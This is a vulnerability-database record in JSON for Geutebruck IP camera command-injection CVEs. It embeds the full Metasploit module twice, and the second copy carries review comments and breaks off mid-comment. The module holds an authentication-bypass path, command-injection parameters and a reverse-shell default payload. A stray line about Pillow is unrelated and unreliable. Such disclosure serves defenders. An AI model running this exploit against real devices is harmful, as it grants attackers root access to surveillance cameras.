                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33551",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33551",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2086",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. 
##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. 
\n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n               
 \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                
\u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n   
 end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33551",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "id": "VAR-202109-0860",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T21:08:56.110000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Multiple  Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158066"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.217000",
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:52.063000",
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in G-Cam E2 and G-Code made by GEUTEBRUCK",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0596

    Vulnerability from variot - Updated: 2025-01-30 21:03

    Multiple camera devices by UDP Technology, Geutebrück and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but may be as follows. * Confidential information is stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code is executed through command injection by a remote third party - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 ‥ * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545 ‥ * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546 ‥ * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547 ‥ * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    # Metasploit remote exploit module (Rank = ExcellentRanking) for the Geutebruck
    # /uapi-cgi/ command-injection CVEs listed under 'References' below.
    # NOTE(review): this copy appears to have been flattened by the page renderer
    # (several statements share one physical line), so read it as a reference
    # listing rather than loadable Ruby.
    # Request patterns visible in this listing, useful for log review on affected
    # devices: a GET of /brand.xml (version check), then a single GET whose path
    # starts with '/../uapi-cgi/' and whose query carries a '$(...)' command
    # substitution in one parameter (testcmd.cgi receives the command directly).
    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    # Registers the module metadata: name, description, authors, references,
    # the per-CVE target table, default payload and the stability/side-effect notes.
    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        # One entry per CVE: the CGI page, the HTTP method (GET for all seven) and
        # the query parameters; the parameter holding PLACEHOLDER_CMD is the one
        # that `exploit` fills in. Every 'uri' starts with '/../uapi-cgi/'
        # (presumably the authentication bypass the description mentions; the
        # listing does not explain it further).
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        # The module declares that it leaves artifacts on disk; which files is not
        # shown in this listing, so treat that as a lead for forensic triage only.
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    # Requests /brand.xml with a GET and returns the first match of
    # digit.1-3 digits.1-3 digits.1-3 digits found in the text of the <firmware>
    # element. Returns false (after print_error) when there is no response, the
    # body is empty, the element is missing, or its text holds no such version.
    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    # Version-only check built on `firmware`: CheckCode::Unknown when no version
    # could be read, CheckCode::Appears for versions <= 1.12.0.27 or exactly
